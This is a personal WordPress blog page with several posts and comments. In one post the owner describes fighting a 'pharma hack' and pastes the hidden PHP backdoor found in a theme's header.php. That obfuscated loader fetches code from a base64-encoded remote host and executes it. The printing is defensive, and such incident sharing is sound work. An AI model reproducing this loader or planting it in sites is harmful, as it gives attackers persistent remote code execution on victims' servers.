![[FSF Associate Member]](http://maffulli.net/wp-content/uploads/getbutton.png){kind=small}
P2 theme from Automattic is awesome. I’m giving it a spin, looks great so far.
Tagged: wordpress Toggle Comment Threads | Keyboard Shortcuts
-
Stef
-
Stef
Getting busy on the blog for the wrong reasons
I’ve been spending lots of time on this blog but not for good reasons. I’m currently under the attack of the nasty pharma hack and I can’t get things to work. I still haven’t identified the backdoor used to enter my wordpress installation. I’ve done all the necessary steps: cleaned the database, removed the offending files, removed the first source of entry, upgraded WP and all plugins + themes I use. I changed the ftp password and database passwords for all three sites I manage on this hosting platform. I did this three times already. Still, every day I get a notification from WP File Monitor that the SOB has modified some files. If anybody has pointers useful to identify the entry point for this cracker please let me know.
UPDATE: I think I found the backdoor that the bastard is using. It was in the header.php of one of the templates:
<?php /* system_remote_fopen procedure */ $er=error_reporting(0); $f_sys_remote_fopen=create_function(‘$uri’,'$_url=@parse_url($uri); if(!$_url || !is_array($_url)) return false; if(!isset($_url["scheme"]) || !in_array($_url["scheme"],array(“http”,”https”))) $uri=”http://”.$uri; if(function_exists(“curl_init”)){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$uri); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_TIMEOUT,10); $txt=curl_exec($ch); curl_close($ch); return $txt; }elseif(function_exists(“fsockopen”)){ $f=@fsockopen($_url["host"],80,$errno,$errstr,5); @stream_set_timeout($f,10); if($f){ $s=”GET $uri HTTP/1.0\r\nHost: “.$_url["host"].”\r\nConnection: Close\r\n\r\n”; @fwrite($f,$s); $txt=”"; while(!feof($f)) $txt.=@fgets($f,128); $txt=trim($txt); } @fclose($f); return substr($txt,strpos($txt,”\r\n\r\n”)+4); }elseif(@ini_get(“allow_url_fopen”)){ @ini_set(“default_socket_timeout”,10); $fp=@fopen($uri,”r”); if(!$fp) return false; $txt=”"; while($ln=@fread($fp,4096)) $txt.=$ln; @fclose($fp); return $txt; }else return “”;’); $sys_remote_fopen=’aHR0cDovL2luY29tZWluLm5ldC8=’; $opt_id=’4f66ac83efc3ebdc05a18f757f30f875′; $sess=@file_get_contents(‘/tmp/sess_’.md5($opt_id)); $_sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.md5′)); if($_sess!=”" && $_sess!=md5($sess)){ $sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.txt’)); $fh=@fopen(“/tmp/sess_”.md5($opt_id),”w+”); @fwrite($fh,$sess); @fclose($fh); } $sess=@unserialize(@base64_decode($sess)); if($sess && $sess['uptime']!=”"){ unset($sess_f); $sess_f=create_function(“\$a”,$sess['uptime']); $sess_f(&$sess); } error_reporting($er); /* system_remote_fopen procedure */ ?>
Lets see how long this lasts.
-
Jeff
-
Stef
I Jeff, I fixed the problem once I found the source of the backdoor. Check the update on this blog post for the script that the bastard was using. You’ll find other details on how to clean the installation on this post http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html. Hope this helps.
-
-
Jeff
Well, I think I finally fixed it. I’ve done most of the security related modifications to my WP install in the past, but the hack continued to find it’s way in. Finally I renamed the database tables and password protected the wp-admin directory, and that is what’s put an end to the problem for me.
-
-
Stef
Upgraded wordpress, closing the week
This WordPress needed some maintainance, but this time instead of upgrading ‘manually’ I decided to use the WordPress Automatic Upgrade Plugin: boy, it was fast and simple. It seems to be working fine.’ If you spot any glitches let me know. Now for me it’s time to go play with the RC minihelicopter and away from computers.
Tomorrow I’ll meet Hal in person for the first time at Malpensa while he is flying to Barcelona for the MWC: I’ll take pictures
-
Stef
Small changes to the blog
I’ve started the new tag system offered by WordPress 2.3.1 a few weeks ago and I’ve also stopped using the categories. I left them on because I didn’t want to change the archives.’ I’m still looking for a way to deal with dual language posts: WordPress seems not to support natively multiple languages (we talked at the Cena Lunga about this with Giacomo and LK).’ I thought of using different categories, it and eng, but I’m not sure how to achieve separate feeds. Gengo seems too complicated and doesn’t work on 2.3.1anyway, other solutions I found seem abandoned. Does anybody know of a *stable* solution to mark posts as Italian or English, offering two separate feeds?
While I was playing with WP I’ve added two new widgets: one from twitter (more freaky experimenting with social networks) and the new FSF fund raising widget. Put it on your blog too and give yourself a nice Christmas present donating to FSF. Did you know they have also a fund to support the defense of poor moms and kids against the RIAA lawsuits?
Jeff and 
Any news on your latest development? I’m anxious to fix this problem on my WordPress install.
Thanks!